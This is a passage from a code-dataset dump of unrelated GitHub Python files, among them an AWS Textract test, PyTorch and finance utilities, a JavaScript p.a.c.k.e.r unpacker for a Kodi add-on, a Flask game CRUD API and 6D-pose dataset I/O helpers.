ax2.text(1.6, 1, txt, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)\n plt.savefig('/home/tle19/Desktop/ResNet_pretrained/results/progress.png')\n plt.close(fig)\n \n_\n","repo_name":"tiarnalee/ResNet_pretrained","sub_path":"resnet_pt.py","file_name":"resnet_pt.py","file_ext":"py","file_size_in_byte":10726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27475752436","text":"import pytest\nimport json\nfrom botocore.stub import Stubber, ANY\nfrom src import 
get_boleto_analysis\n\n@pytest.fixture\ndef textract_stub():\n with Stubber(get_boleto_analysis.textract) as stubber:\n yield stubber\n stubber.assert_no_pending_responses()\n\n@pytest.fixture\ndef sns_stub():\n with Stubber(get_boleto_analysis.sns) as stubber:\n yield stubber\n stubber.assert_no_pending_responses()\n\n@pytest.fixture\ndef sns_textract_notification():\n with open(\"./events/sns_textract_notification.json\", \"r\") as fp:\n return json.load(fp)\n\n@pytest.fixture\ndef textract_response():\n with open(\"./events/textract_response.json\", \"r\") as fp:\n return json.load(fp)\n\ndef test_lambda_handler(sns_textract_notification, lambda_context, textract_response, textract_stub, sns_stub):\n\n textract_stub.add_response(\n method = \"get_document_analysis\",\n service_response = textract_response,\n expected_params = {\"JobId\": ANY}\n )\n\n sns_stub.add_response(\n method = \"publish\",\n service_response = {},\n expected_params = {\"TopicArn\": ANY, \"Message\": ANY}\n )\n\n with textract_stub, sns_stub:\n ret = get_boleto_analysis.lambda_handler(sns_textract_notification, lambda_context)\n\n assert ret[0][\"KeyValuePairs\"][\"BarcodeNumber\"] == \"23793381286002890582082000063303882800000068040\"","repo_name":"aws-samples/textract-boleto-reader","sub_path":"tests/unit/test_get_boleto_analysis.py","file_name":"test_get_boleto_analysis.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"16700215002","text":"\"\"\" Utilities \"\"\"\n\nimport torch\nimport numpy as np\nimport random\n\ndef set_seed(seed=None):\n\t\"\"\"Set random seed, or reset if None.\n\t\"\"\"\n\trandom.seed(seed)\n\tnp.random.seed(seed)\n\tif seed is None: \n\t\ttorch.manual_seed(random.randint(1,1e6))\n\telse:\n\t\ttorch.manual_seed(seed)\n\ndef spectral_radius(A: torch.Tensor, eps=None, n_iter=1000):\n\t\"\"\"Differentiable procedure for computing spectral radius (magnitude of largest eigenvalue)\n\n\tArgs:\n\t\tA: square matrix\n\t\teps: (optional) if provided, uses convergence-based power iteration method\n\t\tn_iter: (optional) if provided, uses power iterations with this many steps (default; 1000 steps)\n\n\tFor 2x2 systems, performs direct computation.\n\t\"\"\"\n\tif A.shape[0] == A.shape[1] == 2: \n\t\ttr, det = A.trace(), A.det()\n\t\tdisc = tr**2 - 4*det \n\t\tif disc >= 0:\n\t\t\treturn torch.max(\n\t\t\t\ttorch.abs(tr + torch.sqrt(disc)) / 2,\n\t\t\t\ttorch.abs(tr - torch.sqrt(disc)) / 2\n\t\t\t)\n\t\telse:\n\t\t\treturn torch.sqrt((tr/2)**2 - disc/4)\n\telif eps is not None:\n\t\treturn _sp_radius_conv(A, eps)\n\telse:\n\t\treturn _sp_radius_niter(A, n_iter)\n\ndef _sp_radius_conv(A: torch.Tensor, eps: float):\n\tv = torch.ones((A.shape[0], 1), device=A.device)\n\tv_new = v.clone()\n\tev = v.t()@A@v\n\tev_new = ev.clone()\n\twhile (A@v_new - ev_new*v_new).norm() > eps:\n\t\tv = v_new\n\t\tev = ev_new\n\t\tv_new = A@v\n\t\tv_new = v_new / v_new.norm()\n\t\tev_new = v_new.t()@A@v_new\n\treturn ev_new\n\ndef _sp_radius_niter(A: torch.Tensor, n_iter: int):\n\tv = torch.ones((A.shape[0], 1), device=A.device)\n\tfor _ in range(n_iter):\n\t\tv = A@v\n\t\tv = v / v.norm()\n\tev = v.t()@A@v\n\treturn ev\n\ndef is_semistable(P: torch.Tensor, eps=1e-2):\n\t\"\"\"Semistability test for transfer operator using spectral radius \"\"\"\n\treturn spectral_radius(P).item() <= 1.0 + eps\n\ndef rmse(X: torch.Tensor, Y: torch.Tensor):\n\tassert X.shape == Y.shape\n\treturn torch.sqrt(torch.mean((X - 
Y)**2)).item()\n\n\"\"\" Tests \"\"\"\n\nif __name__ == '__main__':\n\tset_seed(9001)\n\tdevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n\tprec = 1e-2\n\n\t# 2d spectral radius test\n\tfor _ in range(100):\n\t\td = 2\n\t\tA = torch.randn((d, d), device=device)\n\t\te = np.random.uniform(0.1, 2.00)\n\t\tL = torch.linspace(e, 0.01, d, device=device)\n\t\tP = torch.mm(torch.mm(A, torch.diag(L)), torch.pinverse(A))\n\n\t\tnp_e_max = np.abs(np.linalg.eigvals(P.cpu().numpy())).max()\n\t\tpwr_e_max = spectral_radius(P).item()\n\t\tprint('True:', e, 'numpy:', np_e_max, 'pwr_iter:', pwr_e_max)\n\t\tassert np.abs(e - pwr_e_max) < prec\n\n\t# Nd Power iteration test\n\tfor _ in range(100):\n\t\td = 100\n\t\tA = torch.randn((d, d), device=device)\n\t\te = np.random.uniform(0.1, 1.10)\n\t\tL = torch.linspace(e, 0.01, d, device=device)\n\t\tP = torch.mm(torch.mm(A, torch.diag(L)), torch.pinverse(A))\n\n\t\tnp_e_max = np.abs(np.linalg.eigvals(P.cpu().numpy())).max()\n\t\tpwr_e_max = spectral_radius(P).item()\n\t\tprint('True:', e, 'numpy:', np_e_max, 'pwr_iter:', pwr_e_max)\n\t\tassert np.abs(e - pwr_e_max) < prec","repo_name":"asrvsn/lkf","sub_path":"totorch/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15492133146","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom random import normalvariate\n\n\ndef brownian_bridge(start, end, T, increment=0.1):\n    \"\"\"\n    Produces a simulated path of a brownian bridge.\n    :param start: B_0\n    :param end: B_T\n    :param T: defines interval 0 < t < T\n    :param increment: ΔT\n    :return: simulated brownian bridge path x_t on the interval 0 < t < T\n    \"\"\"\n    x = [start]\n    interval = np.linspace(0+increment, T, int(T//increment))\n    for t in interval[:-1]:\n        x_prev = x[-1]\n        z_i = normalvariate(0, 1)\n        x_t = x_prev + (end - x_prev) * increment/(T-t) + ((increment*(T-t-increment))/(T-t))**0.5 * z_i\n        x.append(x_t)\n\n    plt.plot(interval, x, label='Brownian Bridge')\n    plt.plot(interval, [((end-start)/T)*y + start for y in interval], label='Expectation')\n    plt.legend()\n    plt.grid()\n    plt.show()\n    return x\n\n\nif __name__ == '__main__':\n    brownian_bridge(10, 50, 100)\n","repo_name":"Seannnnnnnnnnn/FinancialEngineering","sub_path":"BrownianBridge.py","file_name":"BrownianBridge.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37534488104","text":"from signal import signal\nimport pandas as pd\nfrom scipy.stats import chi2\nimport sys\nimport numpy as np\n\n\nsignatures = pd.read_csv('C:\\\\Users\\\\dmitr\\\\Desktop\\\\project work\\\\dummy data\\\\signatures.csv')\n\n\nmeans = []\n\nfor i in range(57):\n    means.append(signatures[str(i)].mean())\n\ndiviations = []\n\nfor index, row in signatures.iterrows():\n    diviation = 0\n    for i in range(57):\n        val = row[str(i)]\n        mean = means[i]\n        diviation += abs((val - mean)/mean)\n    diviations.append((diviation, index))\n\ndiviations.sort()\nprint(diviations)","repo_name":"DmitriyFilippov/project-work","sub_path":"LEGACY-outlier calc.py","file_name":"LEGACY-outlier calc.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32692377889","text":"# -*- coding: utf-8 -*-\n# vStream https://github.com/Kodi-vStream/venom-xbmc-addons\n\n#\n# Modified version From 
https://github.com/Kodi-vStream/venom-xbmc-addons\n#\n#\n# Unpacker for Dean Edward's p.a.c.k.e.r, a part of javascript beautifier\n# by Einar Lielmanis \n#\n# written by Stefano Sanfilippo \n#\n# usage:\n#\n# if detect(some_string):\n# unpacked = unpack(some_string)\n#\n\n\"\"\"Unpacker for Dean Edward's p.a.c.k.e.r\"\"\"\n\nimport re\n\nfrom resources.lib.util import Unquote\n\n\nclass cPacker():\n def detect(self, source):\n \"\"\"Detects whether `source` is P.A.C.K.E.R. coded.\"\"\"\n return source.replace(' ', '').startswith('eval(function(p,a,c,k,e,')\n\n def unpack(self, source):\n \"\"\"Unpacks P.A.C.K.E.R. packed js code.\"\"\"\n payload, symtab, radix, count = self._filterargs(source)\n\n # correction pour eviter bypass\n if (len(symtab) > count) and (count > 0):\n del symtab[count:]\n if (len(symtab) < count) and (count > 0):\n symtab.append('BUGGED')\n\n if count != len(symtab):\n raise UnpackingError('Malformed p.a.c.k.e.r. symtab.')\n\n try:\n unbase = Unbaser(radix)\n except TypeError:\n raise UnpackingError('Unknown p.a.c.k.e.r. encoding.')\n\n def lookup(match):\n \"\"\"Look up symbols in the synthetic symtab.\"\"\"\n word = match.group(0)\n return symtab[unbase(word)] or word\n\n source = re.sub(r'\\b\\w+\\b', lookup, payload)\n return self._replacestrings(source)\n\n def _cleanstr(self, str):\n str = str.strip()\n if str.find(\"function\") == 0:\n pattern = (r\"=\\\"([^\\\"]+).*}\\s*\\((\\d+)\\)\")\n args = re.search(pattern, str, re.DOTALL)\n if args:\n a = args.groups()\n def openload_re(match):\n c = match.group(0)\n b = ord(c) + int(a[1])\n return chr(b if (90 if c <= \"Z\" else 122) >= b else b - 26)\n\n str = re.sub(r\"[a-zA-Z]\", openload_re, a[0])\n str = Unquote(str)\n\n elif str.find(\"decodeURIComponent\") == 0:\n str = re.sub(r\"(^decodeURIComponent\\s*\\(\\s*('|\\\"))|(('|\\\")\\s*\\)$)\", \"\", str)\n str = Unquote(str)\n elif str.find(\"\\\"\") == 0:\n str = re.sub(r\"(^\\\")|(\\\"$)|(\\\".*?\\\")\", \"\", str)\n elif str.find(\"'\") == 0:\n str = re.sub(r\"(^')|('$)|('.*?')\", \"\", str)\n\n return str\n\n def _filterargs(self, source):\n \"\"\"Juice from a source file the four args needed by decoder.\"\"\"\n\n source = source.replace(',[],',',0,').replace(\"\\\\'\", \"'\")\n\n juicer = (r\"}\\s*\\(\\s*(.*?)\\s*,\\s*(\\d+)\\s*,\\s*(\\d+)\\s*,\\s*\\((.*?)\\).split\\((.*?)\\)\")\n args = re.search(juicer, source, re.DOTALL)\n if args:\n a = args.groups()\n try:\n return self._cleanstr(a[0]), self._cleanstr(a[3]).split(self._cleanstr(a[4])), int(a[1]), int(a[2])\n except ValueError:\n raise UnpackingError('Corrupted p.a.c.k.e.r. data.')\n\n juicer = (r\"}\\('(.*)', *(\\d+), *(\\d+), *'(.*)'\\.split\\('(.*?)'\\)\")\n# juicer = (r\"}\\(\\\\'(.*)', *(\\d+), *(\\d+), *\\\\'(.*)'\\.split\\(\\\\'(.*?)\\\\'\\)\")\n args = re.search(juicer, source, re.DOTALL)\n if args:\n a = args.groups()\n try:\n return a[0], a[3].split(a[4]), int(a[1]), int(a[2])\n except ValueError:\n raise UnpackingError('Corrupted p.a.c.k.e.r. 
data.')\n\n        # could not find a satisfying regex\n        raise UnpackingError('Could not make sense of p.a.c.k.e.r data (unexpected code structure)')\n\n    def _replacestrings(self, source):\n        \"\"\"Strip string lookup table (list) and replace values in source.\"\"\"\n        match = re.search(r'var *(_\\w+)\\=\\[\"(.*?)\"\\];', source, re.DOTALL)\n\n        if match:\n            varname, strings = match.groups()\n            startpoint = len(match.group(0))\n            lookup = strings.split('\",\"')\n            variable = '%s[%%d]' % varname\n            for index, value in enumerate(lookup):\n                source = source.replace(variable % index, '\"%s\"' % value)\n            return source[startpoint:]\n        return source\n\n\nclass UnpackingError(Exception):\n    \"\"\"Badly packed source or general error.\"\"\"\n    pass\n\n\nclass Unbaser(object):\n    \"\"\"Functor for a given base. Will efficiently convert\n    strings to natural numbers.\"\"\"\n    ALPHABET = {\n        62: '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',\n        95: (' !\"#$%&\\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n             '[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~')\n    }\n\n    def __init__(self, base):\n        self.base = base\n\n        # Error not possible, use 36 by default\n        if base == 0:\n            base = 36\n\n        # If base can be handled by int() builtin, let it do it for us\n        if 2 <= base <= 36:\n            self.unbase = lambda string: int(string, base)\n        else:\n            if base < 62:\n                self.ALPHABET[base] = self.ALPHABET[62][0:base]\n            elif 62 < base < 95:\n                self.ALPHABET[base] = self.ALPHABET[95][0:base]\n            # Build conversion dictionary cache\n            try:\n                self.dictionary = dict((cipher, index) for index, cipher in enumerate(self.ALPHABET[base]))\n            except KeyError:\n                raise TypeError('Unsupported base encoding.')\n\n            self.unbase = self._dictunbaser\n\n    def __call__(self, string):\n        return self.unbase(string)\n\n    def _dictunbaser(self, string):\n        \"\"\"Decodes a value to an integer.\"\"\"\n        ret = 0\n\n        for index, cipher in enumerate(string[::-1]):\n            ret += (self.base ** index) * self.dictionary[cipher]\n        return ret\n","repo_name":"Kodi-vStream/venom-xbmc-addons","sub_path":"plugin.video.vstream/resources/lib/packer.py","file_name":"packer.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","stars":456,"dataset":"github-code","pt":"37"}
+{"seq_id":"8723138201","text":"from flask import Flask, jsonify, request\r\nfrom flask_restx import Api\r\nfrom bd.bd_connect import cursor, conexao\r\nfrom src.server.instance import Server\r\nimport mysql.connector\r\n\r\napp, api = Server.app, Server.api\r\n\r\n@app.route('/game', methods=['GET'])\r\ndef get_game():\r\n    cursor.execute(\"SELECT * FROM games\")\r\n    game = cursor.fetchall()\r\n    return jsonify(game)\r\n\r\n# query by id\r\n@app.route(\"/game/<int:id>\", methods=[\"GET\"])\r\ndef get_game_id(id):\r\n    cursor.execute(\"SELECT * FROM games WHERE id = %s\", (id,))\r\n    game = cursor.fetchall()\r\n    return jsonify(game)\r\n\r\n# create\r\n@app.route(\"/game\", methods=[\"POST\"])\r\ndef insert_game():\r\n    new_game = request.get_json()\r\n    name = new_game['name']\r\n    launched = new_game['launched']\r\n    description = new_game['description']\r\n    cursor.execute(\"INSERT INTO games (name, launched, description) VALUES (%s, %s, %s)\", (name, launched, description))\r\n    conexao.commit()\r\n    return jsonify(new_game)\r\n\r\n\r\n# edit by id\r\n@app.route(\"/game/<int:id>\", methods=[\"PUT\"])\r\ndef edit_game_on_id(id):\r\n    updated = request.get_json()\r\n    name = updated['name']\r\n    launched = updated['launched']\r\n    description = updated['description']\r\n    cursor.execute(\"UPDATE games SET name = %s, launched = %s, description = %s WHERE id = %s\", (name, launched, description, id))\r\n    conexao.commit()\r\n    return jsonify(updated)\r\n\r\n# delete\r\n@app.route(\"/game/<int:id>\", methods=[\"DELETE\"])\r\ndef delete_game(id):\r\n    cursor.execute(\"DELETE FROM games WHERE id = %s\", (id,))\r\n    conexao.commit()\r\n    return jsonify('200 OK')\r\n\r\n# NOTE: the shared cursor/connection must stay open; the route handlers above\r\n# reuse them on every request, so they are not closed at import time.\r\n","repo_name":"kuromadoshii/projeto-cadastro","sub_path":"Game/back-game/src/controllers/game_controller.py","file_name":"game_controller.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"12209294874","text":"# from pysixd toolkit\n# Author: Tomas Hodan (hodantom@cmp.felk.cvut.cz)\n# Center for Machine Perception, Czech Technical University in Prague\n# modified\n\"\"\"I/O functions.\"\"\"\nimport json\nimport os\nimport os.path as osp\nimport struct\nimport sys\n\nimport imageio\nimport mmcv\nimport numpy as np\nimport png\nimport scipy.io as sio\nimport scipy.misc\nimport six\n\n# import ruamel.yaml as yaml\nimport yaml\n\ncur_dir = osp.dirname(osp.abspath(__file__))\nsys.path.append(osp.join(cur_dir, \"../..\"))\nfrom lib.utils import logger\nfrom lib.utils.is_binary_file import is_binary as _is_binary\n\n\ndef load_im(path):\n    \"\"\"Loads an image from a file.\n\n    :param path: Path to the image file to load.\n    :return: ndarray with the loaded image.\n    \"\"\"\n    im = imageio.imread(path)\n    return im\n\n\ndef save_im(path, im, jpg_quality=95):\n    \"\"\"Saves an image to a file.\n\n    :param path: Path to the output image file.\n    :param im: ndarray with the image to save.\n    :param jpg_quality: Quality of the saved image (applies only to JPEG).\n    \"\"\"\n    ext = os.path.splitext(path)[1][1:]\n    if ext.lower() in [\"jpg\", \"jpeg\"]:\n        imageio.imwrite(path, im, quality=jpg_quality)\n    else:\n        imageio.imwrite(path, im)\n\n\ndef load_depth(path):\n    # NOTE: cv2 is much faster (about 2x)\n    \"\"\"Loads a depth image from a file.\n\n    :param path: Path to the depth image file to load.\n    :return: ndarray with the loaded depth image.\n    \"\"\"\n    d = imageio.imread(path)\n    return d.astype(np.float32)\n\n\ndef save_depth(path, im):\n    \"\"\"Saves a depth image (16-bit) to a PNG file.\n\n    :param path: Path to the output depth image file.\n    :param im: ndarray with the depth image to save.\n    \"\"\"\n    if path.split(\".\")[-1].lower() != \"png\":\n        raise ValueError(\"Only PNG format is currently supported.\")\n\n    im_uint16 = np.round(im).astype(np.uint16)\n\n    # PyPNG library can save 16-bit PNG and is faster than imageio.imwrite().\n    # cv2 is far faster still\n    w_depth = png.Writer(im.shape[1], im.shape[0], greyscale=True, bitdepth=16)\n    with open(path, \"wb\") as f:\n        w_depth.write(f, np.reshape(im_uint16, (-1, im.shape[1])))\n\n\ndef load_json(path, keys_to_int=False):\n    \"\"\"Loads content of a JSON file.\n\n    :param path: Path to the JSON file.\n    :return: Content of the loaded JSON file.\n    \"\"\"\n    # Keys to integers.\n    def convert_keys_to_int(x):\n        return {int(k) if k.lstrip(\"-\").isdigit() else k: v for k, v in x.items()}\n\n    with open(path, \"r\") as f:\n        if keys_to_int:\n            content = json.load(f, object_hook=lambda x: convert_keys_to_int(x))\n        else:\n            content = json.load(f)\n\n    return content\n\n\ndef save_json(path, content, sort=False):\n    \"\"\"Saves the provided content to a JSON file.\n\n    :param path: Path to the output JSON file.\n    :param content: Dictionary/list to save.\n    \"\"\"\n    with open(path, \"w\") as f:\n
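\n        # A dict is written one \"key\": value pair per line and a list one element per\n        # line (sorted on request); any other payload falls back to a plain json.dump call.\n        if isinstance(content, 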
dict):\n f.write(\"{\\n\")\n if sort:\n content_sorted = sorted(content.items(), key=lambda x: x[0])\n else:\n content_sorted = content.items()\n for elem_id, (k, v) in enumerate(content_sorted):\n f.write(' \"{}\": {}'.format(k, json.dumps(v, sort_keys=True)))\n if elem_id != len(content) - 1:\n f.write(\",\")\n f.write(\"\\n\")\n f.write(\"}\")\n\n elif isinstance(content, list):\n f.write(\"[\\n\")\n for elem_id, elem in enumerate(content):\n f.write(\" {}\".format(json.dumps(elem, sort_keys=True)))\n if elem_id != len(content) - 1:\n f.write(\",\")\n f.write(\"\\n\")\n f.write(\"]\")\n\n else:\n json.dump(content, f, sort_keys=True)\n\n\n# Set representation of the floating point numbers in YAML files\ndef float_representer(dumper, value):\n text = \"{0:.8f}\".format(value)\n return dumper.represent_scalar(u\"tag:yaml.org,2002:float\", text)\n\n\nyaml.add_representer(float, float_representer)\n\n\n# ===================================\n# LINEMOD_ORIG\ndef read_linemod_transform_dat(transform_dat_path):\n # for LINEMOD ORIG\n transform_dat = np.loadtxt(transform_dat_path, skiprows=1)[:, 1]\n transform_dat = np.reshape(transform_dat, newshape=[3, 4])\n return transform_dat\n\n\ndef load_linemod_orig_model(model_dir):\n # for LINEMOD_ORIG/cls/\n orig_model_path = osp.join(model_dir, \"mesh.ply\")\n orig_old_model_path = osp.join(model_dir, \"OLDmesh.ply\")\n transform_dat_path = osp.join(model_dir, \"transform.dat\")\n if os.path.exists(orig_model_path):\n return ply_vtx(orig_model_path) / 1000.0\n else:\n transform = read_linemod_transform_dat(transform_dat_path)\n old_model = ply_vtx(orig_old_model_path) / 1000.0\n old_model = np.dot(old_model, transform[:, :3].T) + transform[:, 3]\n return old_model\n\n\ndef read_linemod_pose(rot_path, tra_path):\n \"\"\"read linemod orig pose.\"\"\"\n rot = np.loadtxt(rot_path, skiprows=1)\n tra = np.loadtxt(tra_path, skiprows=1) / 100.0\n return np.concatenate([rot, np.reshape(tra, newshape=[3, 1])], axis=-1)\n\n\n# ======================================\ndef pose_from_meta_LM6d(meta_file, cls_idx):\n \"\"\"assume single instance of cls_idx.\"\"\"\n meta_data = sio.loadmat(meta_file)\n inner_id = np.where(np.squeeze(meta_data[\"cls_indexes\"]) == cls_idx)\n if len(meta_data[\"poses\"].shape) == 2:\n pose = meta_data[\"poses\"]\n else:\n pose = np.squeeze(meta_data[\"poses\"][:, :, inner_id])\n return pose\n\n\ndef load_emb_pkl_single(emb_path, cls_idx=None, width=640, height=480):\n assert osp.exists(emb_path), \"not exist {}\".format(emb_path)\n emb = None\n tmp = mmcv.load(emb_path)\n if isinstance(tmp, dict):\n emb = np.zeros((height, width, 3), dtype=np.float32)\n x1, y1, x2, y2 = tmp[\"bbox\"]\n emb[y1 : y2 + 1, x1 : x2 + 1, :] = tmp[\"emb\"]\n elif isinstance(tmp, list) and cls_idx is not None:\n \"\"\"assume single instance of cls_idx.\"\"\"\n for e in tmp:\n if e is not None and e[\"cls_idx\"] == cls_idx:\n emb = np.zeros((height, width, 3), dtype=np.float32)\n x1, y1, x2, y2 = e[\"bbox\"]\n emb[y1 : y2 + 1, x1 : x2 + 1, :] = e[\"emb\"]\n return emb\n\n\ndef load_cam_params(path):\n \"\"\"Loads camera parameters from a JSON file.\n\n :param path: Path to the JSON file.\n :return: Dictionary with the following items:\n - 'im_size': (width, height).\n - 'K': 3x3 intrinsic camera matrix.\n - 'depth_scale': Scale factor to convert the depth images to mm (optional).\n \"\"\"\n c = load_json(path)\n\n cam = {\n \"im_size\": (c[\"width\"], c[\"height\"]),\n \"K\": np.array([[c[\"fx\"], 0.0, c[\"cx\"]], [0.0, c[\"fy\"], c[\"cy\"]], [0.0, 0.0, 
1.0]]),\n }\n\n if \"depth_scale\" in c.keys():\n cam[\"depth_scale\"] = float(c[\"depth_scale\"])\n\n return cam\n\n\ndef load_scene_camera(path):\n \"\"\"Loads content of a JSON file with information about the scene camera.\n\n See docs/bop_datasets_format.md for details.\n\n :param path: Path to the JSON file.\n :return: Dictionary with the loaded content.\n \"\"\"\n scene_camera = load_json(path, keys_to_int=True)\n\n for im_id in scene_camera.keys():\n if \"cam_K\" in scene_camera[im_id].keys():\n scene_camera[im_id][\"cam_K\"] = np.array(scene_camera[im_id][\"cam_K\"], np.float).reshape((3, 3))\n if \"cam_R_w2c\" in scene_camera[im_id].keys():\n scene_camera[im_id][\"cam_R_w2c\"] = np.array(scene_camera[im_id][\"cam_R_w2c\"], np.float).reshape((3, 3))\n if \"cam_t_w2c\" in scene_camera[im_id].keys():\n scene_camera[im_id][\"cam_t_w2c\"] = np.array(scene_camera[im_id][\"cam_t_w2c\"], np.float).reshape((3, 1))\n return scene_camera\n\n\ndef save_scene_camera(path, scene_camera):\n \"\"\"Saves information about the scene camera to a JSON file.\n\n See docs/bop_datasets_format.md for details.\n\n :param path: Path to the output JSON file.\n :param scene_camera: Dictionary to save to the JSON file.\n \"\"\"\n for im_id in sorted(scene_camera.keys()):\n im_camera = scene_camera[im_id]\n if \"cam_K\" in im_camera.keys():\n im_camera[\"cam_K\"] = im_camera[\"cam_K\"].flatten().tolist()\n if \"cam_R_w2c\" in im_camera.keys():\n im_camera[\"cam_R_w2c\"] = im_camera[\"cam_R_w2c\"].flatten().tolist()\n if \"cam_t_w2c\" in im_camera.keys():\n im_camera[\"cam_t_w2c\"] = im_camera[\"cam_t_w2c\"].flatten().tolist()\n save_json(path, scene_camera)\n\n\ndef load_scene_gt(path):\n \"\"\"Loads content of a JSON file with ground-truth annotations.\n\n See docs/bop_datasets_format.md for details.\n\n :param path: Path to the JSON file.\n :return: Dictionary with the loaded content.\n \"\"\"\n scene_gt = load_json(path, keys_to_int=True)\n\n for im_id, im_gt in scene_gt.items():\n for gt in im_gt:\n if \"cam_R_m2c\" in gt.keys():\n gt[\"cam_R_m2c\"] = np.array(gt[\"cam_R_m2c\"], np.float).reshape((3, 3))\n if \"cam_t_m2c\" in gt.keys():\n gt[\"cam_t_m2c\"] = np.array(gt[\"cam_t_m2c\"], np.float).reshape((3, 1))\n return scene_gt\n\n\ndef save_scene_gt(path, scene_gt):\n \"\"\"Saves ground-truth annotations to a JSON file.\n\n See docs/bop_datasets_format.md for details.\n\n :param path: Path to the output JSON file.\n :param scene_gt: Dictionary to save to the JSON file.\n \"\"\"\n for im_id in sorted(scene_gt.keys()):\n im_gts = scene_gt[im_id]\n for gt in im_gts:\n if \"cam_R_m2c\" in gt.keys():\n gt[\"cam_R_m2c\"] = gt[\"cam_R_m2c\"].flatten().tolist()\n if \"cam_t_m2c\" in gt.keys():\n gt[\"cam_t_m2c\"] = gt[\"cam_t_m2c\"].flatten().tolist()\n if \"obj_bb\" in gt.keys():\n gt[\"obj_bb\"] = [int(x) for x in gt[\"obj_bb\"]]\n save_json(path, scene_gt)\n\n\ndef load_bop_results(path, version=\"bop19\"):\n \"\"\"Loads 6D object pose estimates from a file.\n\n :param path: Path to a file with pose estimates.\n :param version: Version of the results.\n :return: List of loaded poses.\n \"\"\"\n results = []\n\n # See docs/bop_challenge_2019.md for details.\n if version == \"bop19\":\n header = \"scene_id,im_id,obj_id,score,R,t,time\"\n with open(path, \"r\") as f:\n line_id = 0\n for line in f:\n line_id += 1\n if line_id == 1 and header in line:\n continue\n else:\n elems = line.split(\",\")\n if len(elems) != 7:\n raise ValueError(\"A line does not have 7 comma-sep. 
elements: {}\".format(line))\n # import pdb; pdb.set_trace();\n result = {\n \"scene_id\": int(elems[0]),\n \"im_id\": int(elems[1]),\n \"obj_id\": int(elems[2]),\n \"score\": float(elems[3]),\n \"R\": np.array(list(map(float, elems[4].split())), np.float).reshape((3, 3)),\n \"t\": np.array(list(map(float, elems[5].split())), np.float).reshape((3, 1)),\n \"time\": float(elems[6]),\n }\n\n results.append(result)\n else:\n raise ValueError(\"Unknown version of BOP results.\")\n\n return results\n\n\ndef save_bop_results(path, results, version=\"bop19\"):\n \"\"\"Saves 6D object pose estimates to a file.\n\n :param path: Path to the output file.\n :param results: Dictionary with pose estimates.\n :param version: Version of the results.\n \"\"\"\n # See docs/bop_challenge_2019.md for details.\n if version == \"bop19\":\n lines = [\"scene_id,im_id,obj_id,score,R,t,time\"]\n for res in results:\n if \"time\" in res:\n run_time = res[\"time\"]\n else:\n run_time = -1\n\n lines.append(\n \"{scene_id},{im_id},{obj_id},{score},{R},{t},{time}\".format(\n scene_id=res[\"scene_id\"],\n im_id=res[\"im_id\"],\n obj_id=res[\"obj_id\"],\n score=res[\"score\"],\n R=\" \".join(map(str, res[\"R\"].flatten().tolist())),\n t=\" \".join(map(str, res[\"t\"].flatten().tolist())),\n time=run_time,\n )\n )\n\n with open(path, \"w\") as f:\n f.write(\"\\n\".join(lines))\n\n else:\n raise ValueError(\"Unknown version of BOP results.\")\n\n\ndef check_bop_results(path, version=\"bop19\"):\n \"\"\"Checks if the format of BOP results is correct.\n\n :param result_filenames: Path to a file with pose estimates.\n :param version: Version of the results.\n :return: True if the format is correct, False if it is not correct.\n \"\"\"\n check_passed = True\n check_msg = \"OK\"\n try:\n results = load_bop_results(path, version)\n\n if version == \"bop19\":\n # Check if the time for all estimates from the same image are the same.\n times = {}\n for result in results:\n result_key = \"{:06d}_{:06d}\".format(result[\"scene_id\"], result[\"im_id\"])\n if result_key in times:\n if abs(times[result_key] - result[\"time\"]) > 0.001:\n check_passed = False\n check_msg = (\n \"The running time for scene {} and image {} is not the same for\"\n \" all estimates.\".format(result[\"scene_id\"], result[\"im_id\"])\n )\n logger.info(check_msg)\n break\n else:\n times[result_key] = result[\"time\"]\n\n except Exception as e:\n check_passed = False\n check_msg = \"Error when loading BOP results: {}\".format(e)\n logger.info(check_msg)\n\n return check_passed, check_msg\n\n\ndef ply_vtx(path, vertex_scale=1.0):\n \"\"\"\n discription: read all vertices from a ply file\n (borrow from https://github.com/paroj/linemod_dataset/blob/master/read.py)\n\n : param path: path to ply model file\n return: all 3D points of ply model: (N, 3)\n \"\"\"\n with open(path) as f:\n assert f.readline().strip() == \"ply\"\n for line in f:\n line = line.strip()\n if \"element vertex\" in line:\n N_str = line.split()[-1]\n # print(N_str)\n N = int(N_str)\n break\n while f.readline().strip() != \"end_header\":\n continue\n pts = []\n for _ in range(N):\n pts.append(np.float32(f.readline().split()[:3]))\n return np.array(pts) * vertex_scale\n\n\ndef ply_vtx_expand(path, vertex_scale=1.0):\n \"\"\"\n discription: read all vertices from a ply file and expand vertices using polygon info.\n (borrow from https://github.com/paroj/linemod_dataset/blob/master/read.py)\n\n : param path: path to ply model file\n return: all 3D points of ply model: (N, 3)\n \"\"\"\n f = open(path)\n 
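# The header scan below picks up the 'element vertex' / 'element face' counts (N, F)\n    # and stops as soon as 'end_header' is reached.\n    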
